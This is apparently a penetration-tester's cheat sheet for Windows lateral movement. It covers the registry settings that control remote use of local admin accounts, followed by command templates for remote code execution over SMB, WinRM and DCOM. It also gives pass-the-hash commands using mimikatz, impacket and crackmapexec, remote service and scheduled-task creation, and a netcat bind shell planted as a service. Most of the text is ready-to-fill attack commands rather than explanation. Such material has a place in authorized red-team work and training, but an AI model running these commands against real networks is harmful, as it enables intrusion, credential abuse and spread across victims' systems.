Lateral movements

Theory

It is not possible to use local administrator account for lateral movement if:

  • EnableLUA = 1

  • LocalAccountTokenFilterPolicy = 0

  • FilterAdministratorToken = 1

If FilterAdministratorToken = 0 and the other values are the same, only the RID 500 admin local account can be used for lateral movement.

In all other cases it is possible to use local administrator account for lateral movement.

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken

Authenticated RCE

SMB
.\psexec64.exe \\<ip> -u .\<administrator> -p <password> [-c <malware.exe>] -s -accepteula
crackmapexec <ip> -u <user> -p <password> -d <domain> -<x|X> <command>
WinRM

From Windows

winrs -r:http://<ip>/wsman "<cmd>"

From Kali

auxiliary/scanner/winrm/winrm_auth_methods
auxiliary/scanner/winrm/winrm_login 
auxiliary/scanner/winrm/winrm_cmd
exploit/windows/winrm/winrm_script_exec
DCOM with MMC application through RPC

https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/

$COM = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.APPLICATION", "<ip>"))
$COM.Document.ActiveView.ExecuteShellCommand("<C:\Windows\System32\calc.exe>", $Null, $Null, "7")
[System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","<ip>")).Document.ActiveView.ExecuteShellCommand("c:\windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe",$null,"\\<ip>\$
./dcomexec.py <domain>/<user>:<password>@<ip> <cmd>

Pass-The-Hash

If NTLM only you can add padding:

00000000000000000000000000000000:8845f7eaee8fb117ad06bdd830b7586c

crackmapexec <ip> -u <user> -H "<lm>" -x "<msfvenom psh-cmd>"
impacket-wmiexec <user>@<ip> -hashes <lm:nt>
pth-winexe -U <user>%<ntlm> //<ip> "<msfvenom psh-cmd>"
wmic -U <domain/><adminuser>%<password> //<host> "<cmd>"
wmis -U <domain/><adminuser>%<password> //<host> "<cmd>"
python wmiexec.py -hashes :<hash> <user>@<ip>
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<lm> /run:<cmd>
kiwi_cmd "\"sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<lm> /run:cmd.exe\""
xfreerdp /u:<user> /d:<domain> /pth:<ntlm> /v:<ip>:3389 /dynamic-resolution
use exploit/windows/smb/psexec
https://github.com/Kevin-Robertson/Invoke-TheHash

Remote invoke executable

From attacker machine

1. Establish SMB session

net use \\<targetip> <password> /u:<domain\username>

2. Dodging the 30-second dilemma

sc \\<targetip> create <service_name> binpath= "cmd.exe /k <command>"
sc \\<targetip> create <service_name> binpath= "cmd.exe /k <c:\tools\nc.exe -L -p <port> -e cmd.exe>"
sc \\<targetip> start <service_name>

1. Establish SMB session

net use \\<targetip> <password> /u:<domain\username>

2. Verify that the Schedule service is running and start it if not

sc \\<targetip> query schedule
sc \\<targetip> start schedule

3. Check the current local time on the target machine

net time \\<targetip>

4. Schedule the job

schtasks /create /tn <taskname> /s <targetip> /u <user> /p <password> /sc <frequency> /st <HH:MM:SS> /sd <startdate> /tr <command>
at \\<targetip> <HH:MM> <A/P> <command>

5. Verify the job status

schtasks /query /s <targetip>
at \\<targetip>

wmic /node:<targetip> /user:<admin_user> /password:<password> process call create <command>
wmic /node:@<list_targetip.txt> /user:<admin_user> /password:<password> process call create <command>
From compromised machine
\\<share>\<exe>

Target another machine using the credentials of the compromised host

run schtasksabuse -c "<command1>(,command2)" -t <targetip>